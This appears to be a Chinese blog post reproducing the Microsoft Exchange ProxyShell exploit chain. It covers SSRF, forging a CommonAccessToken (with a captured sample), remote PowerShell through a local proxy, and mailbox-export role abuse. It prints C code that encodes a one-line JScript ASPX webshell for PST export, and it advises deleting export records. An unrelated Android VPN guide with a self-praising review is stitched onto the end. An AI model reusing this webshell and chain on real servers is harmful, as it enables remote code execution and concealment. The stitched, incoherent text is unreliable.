前言

几天前，Orange在他的BlackHat演讲中又曝出了两条Microsoft Exchange攻击链，即ProxyOrcale和ProxyShell，前者主要用于Padding Orcale攻击，后者则利用路径混淆漏洞实现任意文件写入并最终执行代码。

本文假设读者已经阅读了Orange的幻灯片，并对ProxyLogon具有基本的了解。

另外，请注意，出于显而易见的原因，这里不会公开相应的exploit。相反，本文旨在分享我在复现RCE漏洞和编写exploit方面的经验。

漏洞链

SSRF

这个攻击是从利用一个SSRF漏洞开始的，该漏洞是由于一些奇怪的URI解析造成的路径混乱所致。

PowerShell端点

然后，通过访问内部网络，我们可以尝试访问/powershell端点，从而实现与Exchange PowerShell之间的通信。请注意，由于Exchange的Powershell环境的缘故，我们可以运行的命令是非常有限的。

通过利用SSRF漏洞，我们就能以NT Authroity/System的身份来访问/powershell端点。这在正常情况下是没有问题的，但在这种情况下，由于无法识别，因此无法通过身份验证。因此，我们需要降低我们的权限来获得对端点的访问权限。

该端点需要一个名为X-CommonAccessToken的HTTP头部，但我相信Exchange不会将这个头部转发到内部后端服务器。然而，我们可以通过另一种方式获得令牌：通过提供一个名为X-Rps-CAT的GET参数，其中存放令牌内容；之后，它将被反序列化并添加为X-CommonAccessToken。

执行PowerShell命令

有了验证自己身份的方法，我们就可以更进一步，尝试实现代码执行。正如我之前所说，由于当前环境下会受到各种限制，因此，我们可以利用的东西很少。但是，却存在这样一个命令：通过它，我们能够在机器的任何位置写入文件……但是，文件只能是PST格式。

但是，PST文件并不是把所有的内容都放以明文形式存放，相反，该格式会将文件内容进行编码，这在微软的官方文件中是有介绍的。

所以，我们可以先对payload进行编码，然后，在生成并被编码PST文件时，会对payload再次进行编码，这将使最终结果保持不变。

同时，因为我们可以提供一个网络共享，这意味着我们可以直接告诉Exchange导出文件到\\127.0.0.1\C$\pathto\shell。这个webshell虽然不是很优雅，但的确能用。

但在这之前，我们需要让我们控制的用户拥有导出邮件的权限。为此，我们需要借助于New-ManagementRoleAssignment，我们可以通过它把邮箱导入导出的角色分配给用户。

发送Payload

解决了这个问题后，我们就可以设法发送有效载荷。由于我们将利用New-MailExportRequest，所以，我们需要向要导出的邮箱里发送一封包含有效载荷的邮件。

我发现，有两种方法可以解决这个问题。其中，一种方法是Orange使用的方法，发送一封邮件到地址，然后导出它。另一种方法，是Peter和Jang在Peter的博客中提出的方法：使用EWS来冒充用户，并将包含有效负载的草稿保存为附件。

我决定采取第二种方法，因为它更加方便。

复现漏洞

在上面的章节中，我已经解释了攻击链的基本概念，现在是时候进行复现了。

SSRF部分其实并不重要，它只是后面所有攻击的入口，但本身并没有什么技术上的挑战。

构造CommonAccessToken

所以，我们需要一个有效的令牌，但真正的问题是：怎样才能获得一个有效的令牌呢？

为了抓取一个令牌示例，我设置了一些断点，拦截了Exchange内部发送的一些请求。最后，得到了下面这样一个令牌：

X-CommonAccessToken:VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBZGXEhlYWx0aE1haWxib3g3ZjRiOTM1VS1TLTEtNS0yMS0xOTU2NzE2NjYxLTMwNzcyMTY4MjctMzc2OTU5MzkzLTExMzVHBgAAAAcAAAAsUy0xLTUtMjEtMTk1NjcxNjY2MS0zMDc3MjE2ODI3LTM3Njk1OTM5My01MTMHAAAAB1MtMS0xLTAHAAAAB1MtMS01LTIHAAAACFMtMS01LTExBwAAAAhTLTEtNS0xNQcAAAAIUy0xLTE4LTFFAAAAAA==

很明显，这里使用了base64编码；在解码之后，我决定利用hexdump软件进行观察，因为其中含有数百万个不可打印的字符。

从hexdump中，我们可以看到一些关键字符串：Kerberos、Windows、usernames，以及一些SID。此外，还有一些以单个字母作为前导的数据，这里假设其结构为：Type-Length-Value。

我对一些DLL进行了反汇编，以考察令牌是如何被序列化和反序列化的，并获得一些大致的想法。其中，最令人感兴趣的DLL是Microsoft.Exchange.Security.Authorization.dll。

在Deserialize函数中，我们可以看到V代表版本，T代表类型，C代表压缩的意思。

而E则代表扩展数据的意思。

在WindowsAccessToken中，我们可以找到额外的信息。

其中，A代表认证类型，L代表登录用户，U代表用户SID，最后，G代表组SID。

现在，我们已经知道了令牌的格式，接下来，我们将尝试构建自己的令牌。但现在问题出现了：我们需要一个SID和组SID，对吧？

如果您关注过ProxyLogon的漏洞，就会知道如何去做了。我们可以通过发送一个请求给https://exchange/autodiscover/autodiscover.xml，首先获得传统的域名，然后，使用传统的域名，通过发送另一个请求给https://exchange/mapi/emsmdb/，来找到用户的SID。

那么组SID呢？嗯，在Windows中，用户的SID是唯一的，但组的SID却不是。例如，对于管理员组中的用户，其组SID是S-1-5-32-544。顺便说一下，普通用户的组SID是S-1-5-32-545。

所以，我们基本上掌握了所需的全部信息，那么，我们该如何构建一个令牌呢？对于版本、类型、压缩、授权方面，我们可以保持原样。实际上，我们只需要改变登录名、用户SID以及组SID。

下面是用来生成令牌的部分代码：

我并没有真正弄明白为什么组SID后面总是跟着\x00\x00\x07，在这一点上我真的太懒了。而且，这也不是很重要。

我们已经成功伪造了自己的令牌，现在是时候测试一下，看看能否访问Powershell端点了。

如果响应代码是200，这意味着令牌已经被接受，我们大功告成。否则，则可能需要进行一些调试……

使用远程Powershell

下一个大任务是实现与Powershell端点的通信。实际上，该端点是通过WSMan协议的Powershell进行远程通信的。而WSMan是一个基于HTTP与SOAP XML的协议，如果我们自己动手实现该协议的话，将是一件非常痛苦的事情。

但我们很幸运，有人已经完成了这项艰巨的工作。因为我们可以利用Python库PyPSRP来完成相应的工作。

不过，我们还有一件事需要处理。由于WSMan是直接与目标服务器进行对话的，也就是说，很可能是通过HTTP与exchange:5985端口进行通信的。但我们的情况有点不同。我们需要它与Powershell端点进行通信，而不是其他端口。那么，我们如何实现这一点呢？

首先，我想看看请求是什么样子的，所以，我在自己的机器上设置了一个本地监听器，并发送了一个WinRM请求。在这个测试过程中使用的代码如下所示：

实际上，username、password和auth段其实并不重要，因为这个请求不会发往外部。相反，我们只是想让它发送至127.0.0.1:8080端口，用于测试。

事实证明，这个请求并没有多大区别，我们只需要改变XML数据中的主机字段和一些URI数据即可。

但是，具体该怎么做呢？由于PyPSRP并不支持这种东西，所以，我希望借助于burp，这时我产生了一个想法：我可以为WinRM实现一个本地HTTP代理服务器。

下面是我画的一个简单的示意图：

下面给出HTTP服务器的代码：

在编写exploit时遇到的另一个障碍是线程问题。因为执行到http.service_forever()的时候，服务器就停止了；经过一番研究，我想到一个办法：在另一个线程中启动服务器，这样就好了。

我还想指出，在执行Powershell命令时，一定要进行必要的清理工作，比方说，删除导出请求记录。实际上，有一个Remove-MailboxExportRequest命令，可以用来删除这些记录。

发送Payload

我们需要向Exchange Web Service(EWS)发送一个XML请求，以创建一个带有payload附件的电子邮件草稿。为了节省读者的时间，因为我已经花了一天的时间在这上面，这里直接给出相应的XML模板。它是在Peter提供的payload的基础上改造而成的。

下一个部分代码中含有我们的payload，它实际上就是一行ASPX webshell命令：

下一部分代码，将对payload进行编码，所以，当PST再次进行编码时，将恢复为明文形式的payload。

在微软的页面上，我稍微修改了一下代码，编译并保存了二进制数据，然后对其进行了base64编码。

#include < stdio.h >  #include < windows.h > #include < string.h >   byte mpbbCrypt[] =  {       65,  54,  19,  98, 168,  33, 110, 187,      244,  22, 204,   4, 127, 100, 232,  93,       30, 242, 203,  42, 116, 197,  94,  53,      210, 149,  71, 158, 150,  45, 154, 136,       76, 125, 132,  63, 219, 172,  49, 182,       72,  95, 246, 196, 216,  57, 139, 231,       35,  59,  56, 142, 200, 193, 223,  37,      177,  32, 165,  70,  96,  78, 156, 251,      170, 211,  86,  81,  69, 124,  85,   0,        7, 201,  43, 157, 133, 155,   9, 160,      143, 173, 179,  15,  99, 171, 137,  75,      215, 167,  21,  90, 113, 102,  66, 191,       38,  74, 107, 152, 250, 234, 119,  83,      178, 112,   5,  44, 253,  89,  58, 134,      126, 206,   6, 235, 130, 120,  87, 199,      141,  67, 175, 180,  28, 212,  91, 205,      226, 233,  39,  79, 195,   8, 114, 128,      207, 176, 239, 245,  40, 109, 190,  48,       77,  52, 146, 213,  14,  60,  34,  50,      229, 228, 249, 159, 194, 209,  10, 129,       18, 225, 238, 145, 131, 118, 227, 151,      230,  97, 138,  23, 121, 164, 183, 220,      144, 122,  92, 140,   2, 166, 202, 105,      222,  80,  26,  17, 147, 185,  82, 135,       88, 252, 237,  29,  55,  73,  27, 106,      224,  41,  51, 153, 189, 108, 217, 148,      243,  64,  84, 111, 240, 198, 115, 184,      214,  62, 101,  24,  68,  31, 221, 103,       16, 241,  12,  25, 236, 174,   3, 161,       20, 123, 169,  11, 255, 248, 163, 192,      162,   1, 247,  46, 188,  36, 104, 117,       13, 254, 186,  47, 181, 208, 218,  61,       20,  83,  15,  86, 179, 200, 122, 156,      235, 101,  72,  23,  22,  21, 159,   2,      204,  84, 124, 131,   0,  13,  12,  11,      162,  98, 168, 118, 219, 217, 237, 199,      197, 164, 220, 172, 133, 116, 214, 208,      167, 155, 174, 154, 150, 113, 102, 195,       99, 153, 184, 221, 115, 146, 142, 132,      125, 165,  94, 209,  93, 147, 177,  87,       81,  80, 128, 137,  82, 148,  79,  78,       10, 107, 188, 141, 127, 110,  71,  70,       65,  64,  68,   1,  17, 203,   3,  63,      247, 244, 225, 169, 143,  60,  58, 249,      251, 240,  25,  48, 130,   9,  46, 201,      157, 160, 134,  73, 238, 111,  77, 109,      196,  45, 129,  52,  37, 135,  27, 136,      170, 252,   6, 161,  18,  56, 253,  76,       66, 114, 100,  19,  55,  36, 106, 117,      119,  67, 255, 230, 180,  75,  54,  92,      228, 216,  53,  61,  69, 185,  44, 236,      183,  49,  43,  41,   7, 104, 163,  14,      105, 123,  24, 158,  33,  57, 190,  40,       26,  91, 120, 245,  35, 202,  42, 176,      175,  62, 254,   4, 140, 231, 229, 152,       50, 149, 211, 246,  74, 232, 166, 234,      233, 243, 213,  47, 112,  32, 242,  31,        5, 103, 173,  85,  16, 206, 205, 227,       39,  59, 218, 186, 215, 194,  38, 212,      145,  29, 210,  28,  34,  51, 248, 250,      241,  90, 239, 207, 144, 182, 139, 181,      189, 192, 191,   8, 151,  30, 108, 226,       97, 224, 198, 193,  89, 171, 187,  88,      222,  95, 223,  96, 121, 126, 178, 138,       71, 241, 180, 230,  11, 106, 114,  72,      133,  78, 158, 235, 226, 248, 148,  83,      224, 187, 160,   2, 232,  90,   9, 171,      219, 227, 186, 198, 124, 195,  16, 221,       57,   5, 150,  48, 245,  55,  96, 130,      140, 201,  19,  74, 107,  29, 243, 251,      143,  38, 151, 202, 145,  23,   1, 196,       50,  45, 110,  49, 149, 255, 217,  35,      209,   0,  94, 121, 220,  68,  59,  26,       40, 197,  97,  87,  32, 144,  61, 131,      185,  67, 190, 103, 210,  70,  66, 118,      192, 109,  91, 126, 178,  15,  22,  41,       60, 169,   3,  84,  13, 218,  93, 223,      246, 183, 199,  98, 205, 141,   6, 211,      105,  92, 134, 214,  20, 247, 165, 102,      117, 172, 177, 233,  69,  33, 112,  12,      135, 159, 116, 164,  34,  76, 111, 191,       31,  86, 170,  46, 179, 120,  51,  80,      176, 163, 146, 188, 207,  25,  28, 167,       99, 203,  30,  77,  62,  75,  27, 155,       79, 231, 240, 238, 173,  58, 181,  89,        4, 234,  64,  85,  37,  81, 229, 122,      137,  56, 104,  82, 123, 252,  39, 174,      215, 189, 250,   7, 244, 204, 142,  95,      239,  53, 156, 132,  43,  21, 213, 119,       52,  73, 182,  18,  10, 127, 113, 136,      253, 157,  24,  65, 125, 147, 216,  88,       44, 206, 254,  36, 175, 222, 184,  54,      200, 161, 128, 166, 153, 152, 168,  47,       14, 129, 101, 115, 228, 194, 162, 138,      212, 225,  17, 208,   8, 139,  42, 242,      237, 154, 100,  63, 193, 108, 249, 236  };    #define mpbbR   (mpbbCrypt)  #define mpbbS   (mpbbCrypt + 256)  #define mpbbI   (mpbbCrypt + 512)    void CryptPermute(PVOID pv, int cb, BOOL fEncrypt)  {     // cb -> buffer size     // pv -> buffer     byte *          pb      = (byte *)pv;     byte *          pbTable   = fEncrypt ? mpbbR : mpbbI;     const DWORD *   pdw    = (const DWORD *) pv;     DWORD         dwCurr;     byte         b;       if (cb >= sizeof(DWORD))     {        while (0 != (((DWORD_PTR) pb) % sizeof(DWORD)))        {           *pb = pbTable[*pb];           pb++;           cb--;        }          pdw = (const DWORD *) pb;        for (; cb >= 4; cb -= 4)        {           dwCurr = *pdw;             b = (byte) (dwCurr & 0xFF);           *pb = pbTable[b];           pb++;             dwCurr = dwCurr >> 8;                 b = (byte) (dwCurr & 0xFF);           *pb = pbTable[b];           pb++;             dwCurr = dwCurr >> 8;                 b = (byte) (dwCurr  & 0xFF);           *pb = pbTable[b];           pb++;             dwCurr = dwCurr >> 8;                 b = (byte) (dwCurr  & 0xFF);           *pb = pbTable[b];           pb++;             pdw++;        }          pb = (byte *) pdw;     }       for (; --cb >= 0; ++pb)        *pb = pbTable[*pb]; }     void main(){     char[] payload = "< script language='JScript' runat='server' Page aspcompat=true >function Page_Load(){eval(Request['cmd'],'unsafe');}< /script >";     int length = strlen(payload);     CryptPermute(payload, length, false);     printf(payload);   }

最后，我真的搞不清楚什么是正确的编码方式，只好进行蛮力测试，直到有一个成功为止。

现在，漏洞链的每个部分都搞定了，终于可以把组合在一起进行测试了。

测试结果

尽管webshell有点乱，但借助于正则表达式的威力，我们仍然可以得到一个比较清晰的结果。

小结

这一次，我们根据其他研究人员的论文，实现了自己的漏洞利用方法。说实话，这个攻击链真的很酷，我在利用这个漏洞的过程中学到了很多东西。我非常感谢Peter的文章，也感谢Orange提供的这个惊人的攻击链。希望本文对于大家理解这个漏洞能够有所帮助。

我收集了相关的资料与工具，有需要的朋友可以关注私信我哦！！！

安卓科学上网全攻略：从入门到精通的终极指南

在当今高度互联的世界中，互联网已成为人们获取信息、交流思想的重要渠道。然而，由于各种原因，许多国家和地区对互联网内容实施了不同程度的限制，这使得用户无法自由访问全球范围内的优质资源。面对这种情况，"科学上网"技术应运而生，成为突破网络封锁、实现信息自由流动的有效手段。

作为全球使用最广泛的移动操作系统，安卓设备因其开放性和可定制性，成为科学上网的理想平台。本文将为您详细介绍在安卓设备上实现科学上网的各种方法、工具选择、设置步骤以及注意事项，助您轻松突破网络限制，畅游无界互联网。

一、科学上网的核心原理与技术

科学上网的本质是通过技术手段绕过网络审查，实现自由访问互联网内容。其核心原理可以概括为：在用户设备与目标网站之间建立一个加密的"隧道"，使网络审查系统无法识别和阻断用户的访问请求。

目前主流的科学上网技术包括：

1. VPN（虚拟专用网络）

   • 工作原理：在用户与VPN服务器之间建立加密通道，所有网络流量都通过该通道传输
   • 优势：配置简单，兼容性好，适合新手
   • 劣势：容易被识别和封锁，速度可能受影响

2. Shadowsocks

   • 工作原理：采用SOCKS5代理协议，混淆流量特征，使其看起来像普通HTTPS流量
   • 优势：抗封锁能力强，轻量高效
   • 劣势：需要自行搭建或购买服务，配置稍复杂

3. V2Ray

   • 工作原理：模块化设计，支持多种传输协议，可动态调整流量特征
   • 优势：抗封锁能力极强，功能丰富
   • 劣势：配置复杂，适合高级用户

4. Trojan

   • 工作原理：伪装成正常HTTPS流量，深度混淆
   • 优势：极难被识别和封锁
   • 劣势：需要域名和SSL证书，部署门槛较高

二、安卓科学上网工具的选择与安装

1. 工具选择指南

选择科学上网工具时，应考虑以下因素：
- 易用性：新手建议选择操作简单的VPN应用
- 稳定性：查看用户评价，选择连接稳定的工具
- 速度：不同工具和服务器节点的速度差异较大
- 安全性：确保工具采用强加密算法，无日志记录

推荐工具清单：
- VPN类：ExpressVPN、NordVPN、Surfshark
- Shadowsocks类：Shadowsocks-android、AnXray
- V2Ray类：V2RayNG、Clash for Android
- Trojan类：Igniter、Pharos

2. 安装方法详解

方法一：通过Google Play商店安装

1. 打开Google Play商店
2. 搜索工具名称（如"ExpressVPN"）
3. 点击"安装"按钮
4. 等待安装完成后打开应用

方法二：手动安装APK文件

对于未上架Play商店的工具，可按照以下步骤安装：
1. 在浏览器中访问工具官网，下载APK文件
2. 进入"设置"→"安全"，启用"允许安装未知来源应用"
3. 找到下载的APK文件并点击安装
4. 安装完成后即可打开使用

三、详细配置与使用教程

1. VPN配置示例（以ExpressVPN为例）

1. 打开应用，登录账号
2. 点击"连接"按钮，自动选择最优服务器
3. 或手动选择特定国家/地区的服务器
4. 连接成功后，状态栏会显示VPN图标

2. Shadowsocks配置指南

1. 获取服务器配置信息（服务器地址、端口、密码、加密方式）
2. 打开Shadowsocks客户端，点击"+"添加配置
3. 填写服务器信息并保存
4. 选择配置，点击"连接"按钮
5. 连接成功后即可自由上网

3. V2Ray高级配置

1. 获取V2Ray配置文件（通常为JSON格式）
2. 打开V2RayNG客户端，点击"+"导入配置
3. 可选择扫描二维码或手动输入配置
4. 选择节点，点击右下角按钮连接
5. 在"设置"中可调整路由规则、传输协议等高级选项

四、使用技巧与优化建议

1. 提升连接速度的方法

• 选择地理位置较近的服务器节点
• 尝试不同的传输协议（如WebSocket、mKCP）
• 关闭其他占用带宽的应用
• 在非高峰时段使用

2. 增强隐私保护的措施

• 启用"Always-on VPN"功能（设置→网络和互联网→VPN）
• 配合使用隐私浏览器（如Firefox Focus）
• 定期更换服务器节点
• 避免在科学上网时登录敏感账号

3. 故障排除指南

问题1：连接失败
- 检查网络连接是否正常
- 尝试切换不同的服务器节点
- 更新应用到最新版本

问题2：速度缓慢
- 测试不同节点的速度
- 更换传输协议（如从TCP改为WebSocket）
- 检查本地网络状况

问题3：频繁断线
- 启用"自动重连"功能
- 调整心跳间隔设置
- 联系服务提供商咨询

五、法律与道德考量

虽然科学上网技术本身是中性的，但在不同国家和地区的法律框架下，其使用可能受到限制。使用者应当：

1. 了解并遵守当地法律法规
2. 将技术用于合法正当的用途
3. 尊重知识产权，不访问盗版内容
4. 保护个人隐私，不从事违法活动

六、未来趋势与展望

随着网络审查技术的不断升级，科学上网技术也在持续演进。未来可能出现以下发展趋势：

1. AI驱动的自适应代理：根据网络环境自动调整策略
2. 区块链去中心化VPN：提高抗审查能力
3. 量子加密技术：提供更高级别的安全保护
4. 更智能的流量混淆：使科学上网流量更难被识别

结语

掌握安卓科学上网技术，就如同获得了一把开启互联网宝库的钥匙。通过本文的详细指导，您应该已经了解了从工具选择到配置使用的全过程。记住，技术是一把双刃剑，希望您能合理、合法地使用这项技术，让它成为拓展视野、获取知识的助力，而非违法工具。

在这个信息爆炸的时代，保持对知识的渴望和对真相的追求固然重要，但同样重要的是做一个负责任、守法的数字公民。愿您能在广阔的网络世界中安全、自由地探索，收获属于自己的精彩。

语言精彩点评：
本文以专业而不失通俗的语言，系统性地介绍了安卓科学上网的方方面面。文章结构严谨，从基础原理到实践操作层层递进，既照顾了技术小白的入门需求，又满足了高级用户的深度探索欲望。语言表达准确流畅，技术术语解释清晰，使复杂的概念易于理解。

特别值得一提的是，文章不仅关注技术实现，还强调了法律和道德层面的考量，体现了作者负责任的态度。最后的展望部分为读者勾勒出技术发展的未来图景，增加了文章的深度和前瞻性。整体而言，这是一篇内容丰富、观点平衡、实用性强的优质指南，能够真正帮助读者解决实际问题。